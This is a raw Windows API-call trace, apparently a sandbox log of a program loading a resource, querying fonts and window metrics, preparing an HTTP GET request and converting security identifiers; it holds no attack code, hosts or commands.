[0110.403] FindResourceA (hModule=0x2830000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2938990
[0110.403] FindResourceA (hModule=0x2830000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2938990
[0110.403] LoadResource (hModule=0x2830000, hResInfo=0x2938990) returned 0x293f044
[0110.403] SizeofResource (hModule=0x2830000, hResInfo=0x2938990) returned 0xca5
[0110.403] LockResource (hResData=0x293f044) returned 0x293f044
[0110.403] GetCurrentThreadId () returned 0xfa0
[0110.403] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f108, fWinIni=0x0 | out: pvParam=0x24f108) returned 1
[0110.403] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f108, fWinIni=0x0 | out: pvParam=0x24f108) returned 1
[0110.403] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f108, fWinIni=0x0 | out: pvParam=0x24f108) returned 1
[0110.403] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x24f108, fWinIni=0x0 | out: pvParam=0x24f108) returned 1
[0110.404] GetDC (hWnd=0x0) returned 0x1201087d
[0110.405] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f0ec | out: lptm=0x24f0ec) returned 1
[0110.405] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0110.406] CreateFontIndirectA (lplf=0x24f0a4) returned 0x5d0a0820
[0110.406] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.406] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f124 | out: lptm=0x24f124) returned 1
[0110.406] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.406] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.406] GetSystemMetrics (nIndex=6) returned 1
[0110.406] VirtualAlloc (lpAddress=0x2954000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2954000
[0110.407] GetDC (hWnd=0x0) returned 0x1201087d
[0110.407] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f0ec | out: lptm=0x24f0ec) returned 1
[0110.407] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.407] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f124 | out: lptm=0x24f124) returned 1
[0110.407] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.407] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.407] GetSystemMetrics (nIndex=6) returned 1
[0110.407] GetDC (hWnd=0x0) returned 0x1201087d
[0110.407] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f0ec | out: lptm=0x24f0ec) returned 1
[0110.407] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.407] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f124 | out: lptm=0x24f124) returned 1
[0110.407] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.407] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.407] GetSystemMetrics (nIndex=6) returned 1
[0110.408] GetDC (hWnd=0x0) returned 0x1201087d
[0110.408] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f0ec | out: lptm=0x24f0ec) returned 1
[0110.408] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.408] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f124 | out: lptm=0x24f124) returned 1
[0110.408] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.408] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.408] GetSystemMetrics (nIndex=6) returned 1
[0110.408] GetDC (hWnd=0x0) returned 0x1201087d
[0110.408] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f100 | out: lptm=0x24f100) returned 1
[0110.408] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.408] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f138 | out: lptm=0x24f138) returned 1
[0110.408] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.408] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.408] GetSystemMetrics (nIndex=6) returned 1
[0110.408] GetDC (hWnd=0x0) returned 0x1201087d
[0110.408] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee04 | out: lptm=0x24ee04) returned 1
[0110.408] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.408] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee3c | out: lptm=0x24ee3c) returned 1
[0110.408] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.408] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.409] GetSystemMetrics (nIndex=6) returned 1
[0110.409] GetDC (hWnd=0x0) returned 0x1201087d
[0110.409] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f100 | out: lptm=0x24f100) returned 1
[0110.409] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.409] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f138 | out: lptm=0x24f138) returned 1
[0110.409] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.409] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.409] GetSystemMetrics (nIndex=6) returned 1
[0110.409] GetDC (hWnd=0x0) returned 0x1201087d
[0110.409] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee04 | out: lptm=0x24ee04) returned 1
[0110.409] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.409] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee3c | out: lptm=0x24ee3c) returned 1
[0110.409] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.409] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.409] GetSystemMetrics (nIndex=6) returned 1
[0110.409] GetDC (hWnd=0x0) returned 0x1201087d
[0110.410] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f100 | out: lptm=0x24f100) returned 1
[0110.410] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.410] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f138 | out: lptm=0x24f138) returned 1
[0110.410] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.410] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.410] GetSystemMetrics (nIndex=6) returned 1
[0110.410] GetDC (hWnd=0x0) returned 0x1201087d
[0110.410] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee04 | out: lptm=0x24ee04) returned 1
[0110.410] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.410] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee3c | out: lptm=0x24ee3c) returned 1
[0110.410] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.410] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.410] GetSystemMetrics (nIndex=6) returned 1
[0110.410] GetDC (hWnd=0x0) returned 0x1201087d
[0110.410] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f0ec | out: lptm=0x24f0ec) returned 1
[0110.410] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.410] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f124 | out: lptm=0x24f124) returned 1
[0110.410] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.410] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.410] GetSystemMetrics (nIndex=6) returned 1
[0110.411] GetDC (hWnd=0x0) returned 0x1201087d
[0110.411] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f0ec | out: lptm=0x24f0ec) returned 1
[0110.411] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.411] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f124 | out: lptm=0x24f124) returned 1
[0110.411] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.411] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.411] GetSystemMetrics (nIndex=6) returned 1
[0110.411] GetDC (hWnd=0x0) returned 0x1201087d
[0110.411] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f100 | out: lptm=0x24f100) returned 1
[0110.411] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.411] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f138 | out: lptm=0x24f138) returned 1
[0110.411] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.411] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.411] GetSystemMetrics (nIndex=6) returned 1
[0110.411] GetDC (hWnd=0x0) returned 0x1201087d
[0110.411] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee04 | out: lptm=0x24ee04) returned 1
[0110.411] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.411] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee3c | out: lptm=0x24ee3c) returned 1
[0110.412] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.412] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.412] GetSystemMetrics (nIndex=6) returned 1
[0110.412] GetDC (hWnd=0x0) returned 0x1201087d
[0110.412] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f100 | out: lptm=0x24f100) returned 1
[0110.412] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.412] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f138 | out: lptm=0x24f138) returned 1
[0110.412] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.412] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.412] GetSystemMetrics (nIndex=6) returned 1
[0110.412] GetDC (hWnd=0x0) returned 0x1201087d
[0110.412] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee04 | out: lptm=0x24ee04) returned 1
[0110.412] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.412] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee3c | out: lptm=0x24ee3c) returned 1
[0110.412] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.412] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.412] GetSystemMetrics (nIndex=6) returned 1
[0110.413] GetDC (hWnd=0x0) returned 0x1201087d
[0110.413] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f100 | out: lptm=0x24f100) returned 1
[0110.413] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.413] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f138 | out: lptm=0x24f138) returned 1
[0110.413] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.413] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.413] GetSystemMetrics (nIndex=6) returned 1
[0110.413] GetDC (hWnd=0x0) returned 0x1201087d
[0110.413] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee04 | out: lptm=0x24ee04) returned 1
[0110.413] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.413] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee3c | out: lptm=0x24ee3c) returned 1
[0110.413] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.413] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.413] GetSystemMetrics (nIndex=6) returned 1
[0110.413] GetDC (hWnd=0x0) returned 0x1201087d
[0110.413] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f100 | out: lptm=0x24f100) returned 1
[0110.413] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.413] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f138 | out: lptm=0x24f138) returned 1
[0110.413] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.413] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.414] GetSystemMetrics (nIndex=6) returned 1
[0110.414] GetDC (hWnd=0x0) returned 0x1201087d
[0110.414] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee04 | out: lptm=0x24ee04) returned 1
[0110.414] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.414] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24ee3c | out: lptm=0x24ee3c) returned 1
[0110.414] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.414] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.414] GetSystemMetrics (nIndex=6) returned 1
[0110.414] GetDC (hWnd=0x0) returned 0x1201087d
[0110.414] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f0ec | out: lptm=0x24f0ec) returned 1
[0110.414] SelectObject (hdc=0x1201087d, h=0x5d0a0820) returned 0x18a002e
[0110.414] GetTextMetricsA (in: hdc=0x1201087d, lptm=0x24f124 | out: lptm=0x24f124) returned 1
[0110.414] SelectObject (hdc=0x1201087d, h=0x18a002e) returned 0x5d0a0820
[0110.414] ReleaseDC (hWnd=0x0, hDC=0x1201087d) returned 1
[0110.414] GetSystemMetrics (nIndex=6) returned 1
[0110.416] SysReAllocStringLen (in: pbstr=0x295f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0110.417] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.417] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.417] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.417] SysReAllocStringLen (in: pbstr=0x295f388*="GET", psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0110.417] SysReAllocStringLen (in: pbstr=0x295f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x295f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0110.417] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x24f188, lpdwBufferLength=0x24f18c | out: lpBuffer=0x24f188, lpdwBufferLength=0x24f18c) returned 1
[0110.496] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x24f188, dwBufferLength=0x4) returned 1
[0110.496] VirtualFree (lpAddress=0x2960000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0110.496] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2956490, cbMultiByte=3, lpWideCharStr=0x24e0c0, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0110.496] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.496] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.496] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.496] SysReAllocStringLen (in: pbstr=0x295f388*="GET", psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0110.497] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.497] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.497] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0110.497] SysReAllocStringLen (in: pbstr=0x295f388*="GET", psz="GET", len=0x3 | out: pbstr=0x295f388*="GET") returned 1
[0110.548] GetTextExtentPoint32A (in: hdc=0xd010847, lpString="0", c=1, psizl=0x24f27c | out: psizl=0x24f27c) returned 1
[0110.548] IsIconic (hWnd=0x900ea) returned 0
[0110.548] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f27c | out: lpRect=0x24f27c) returned 1
[0110.548] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.548] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.548] IsIconic (hWnd=0x900ea) returned 0
[0110.548] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f1c4 | out: lpRect=0x24f1c4) returned 1
[0110.548] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.548] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.548] IsIconic (hWnd=0x900ea) returned 0
[0110.548] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.548] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.548] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.548] IsIconic (hWnd=0x900ea) returned 0
[0110.548] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.548] FlatSB_SetScrollProp (param_1=0x900ea, index=0x200, newValue=0x0, param_4=0) returned 0
[0110.548] GetSysColor (nIndex=20) returned 0xffffff
[0110.548] FlatSB_SetScrollProp (param_1=0x900ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0110.548] FlatSB_SetScrollInfo (param_1=0x900ea, code=0, psi=0x24f1d2, fRedraw=1) returned 0
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] IsIconic (hWnd=0x900ea) returned 0
[0110.549] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] IsIconic (hWnd=0x900ea) returned 0
[0110.549] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] IsIconic (hWnd=0x900ea) returned 0
[0110.549] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.549] FlatSB_SetScrollProp (param_1=0x900ea, index=0x100, newValue=0x0, param_4=0) returned 0
[0110.549] GetSysColor (nIndex=20) returned 0xffffff
[0110.549] FlatSB_SetScrollProp (param_1=0x900ea, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0110.549] FlatSB_SetScrollInfo (param_1=0x900ea, code=1, psi=0x24f1d2, fRedraw=1) returned 0
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] IsIconic (hWnd=0x900ea) returned 0
[0110.549] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] IsIconic (hWnd=0x900ea) returned 0
[0110.549] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f1c4 | out: lpRect=0x24f1c4) returned 1
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] IsIconic (hWnd=0x900ea) returned 0
[0110.549] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.549] IsIconic (hWnd=0x900ea) returned 0
[0110.549] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.549] FlatSB_SetScrollProp (param_1=0x900ea, index=0x200, newValue=0x0, param_4=0) returned 0
[0110.549] GetSysColor (nIndex=20) returned 0xffffff
[0110.549] FlatSB_SetScrollProp (param_1=0x900ea, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0110.549] FlatSB_SetScrollInfo (param_1=0x900ea, code=0, psi=0x24f1d2, fRedraw=1) returned 0
[0110.550] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.550] IsIconic (hWnd=0x900ea) returned 0
[0110.550] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.550] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.550] IsIconic (hWnd=0x900ea) returned 0
[0110.550] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.550] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.550] IsIconic (hWnd=0x900ea) returned 0
[0110.550] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.550] FlatSB_SetScrollProp (param_1=0x900ea, index=0x100, newValue=0x0, param_4=0) returned 0
[0110.550] GetSysColor (nIndex=20) returned 0xffffff
[0110.550] FlatSB_SetScrollProp (param_1=0x900ea, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0110.550] FlatSB_SetScrollInfo (param_1=0x900ea, code=1, psi=0x24f1d2, fRedraw=1) returned 0
[0110.550] GetWindowLongA (hWnd=0x900ea, nIndex=-16) returned 116326400
[0110.550] IsIconic (hWnd=0x900ea) returned 0
[0110.550] GetClientRect (in: hWnd=0x900ea, lpRect=0x24f194 | out: lpRect=0x24f194) returned 1
[0110.550] GetCurrentThreadId () returned 0xfa0
[0110.551] ConvertSidToStringSidA () returned 0x1
[0110.551] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.551] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0110.551] LocalFree (hMem=0x146f40) returned 0x0
[0110.551] LocalFree (hMem=0x132f90) returned 0x0
[0110.551] ConvertStringSidToSidA () returned 0x1
[0110.551] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2952914, pSourceSid=0x132f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2952914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.551] IsValidSid (pSid=0x2952914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.551] ConvertSidToStringSidA () returned 0x1
[0110.551] LocalFree (hMem=0x146f40) returned 0x0
[0110.551] LocalFree (hMem=0x132f90) returned 0x0
[0110.551] ConvertStringSidToSidA () returned 0x1
[0110.551] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295702c, pSourceSid=0x132f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x295702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.551] IsValidSid (pSid=0x295702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.551] ConvertSidToStringSidA () returned 0x1
[0110.551] LocalFree (hMem=0x146f40) returned 0x0
[0110.551] LocalFree (hMem=0x132f90) returned 0x0
[0110.551] ConvertStringSidToSidA () returned 0x1
[0110.551] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f5a0, pSourceSid=0x132f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x295f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.551] IsValidSid (pSid=0x295f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.551] ConvertSidToStringSidA () returned 0x1
[0110.551] LocalFree (hMem=0x146f40) returned 0x0
[0110.551] LocalFree (hMem=0x132f90) returned 0x0
[0110.552] ConvertStringSidToSidA () returned 0x1
[0110.552] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f614, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.552] IsValidSid (pSid=0x295f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.552] ConvertSidToStringSidA () returned 0x1
[0110.552] LocalFree (hMem=0x146f58) returned 0x0
[0110.552] LocalFree (hMem=0x146f40) returned 0x0
[0110.552] ConvertStringSidToSidA () returned 0x1
[0110.552] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f688, pSourceSid=0x146f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x295f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0110.552] IsValidSid (pSid=0x295f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0110.552] ConvertSidToStringSidA () returned 0x1
[0110.552] LocalFree (hMem=0x146f58) returned 0x0
[0110.552] LocalFree (hMem=0x146f40) returned 0x0
[0110.552] ConvertStringSidToSidA () returned 0x1
[0110.552] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f6fc, pSourceSid=0x146f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x295f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0110.552] IsValidSid (pSid=0x295f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0110.552] ConvertSidToStringSidA () returned 0x1
[0110.552] LocalFree (hMem=0x13c1c8) returned 0x0
[0110.552] LocalFree (hMem=0x146f58) returned 0x0
[0110.552] ConvertStringSidToSidA () returned 0x1
[0110.552] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x295f770, pSourceSid=0x146f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x295f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
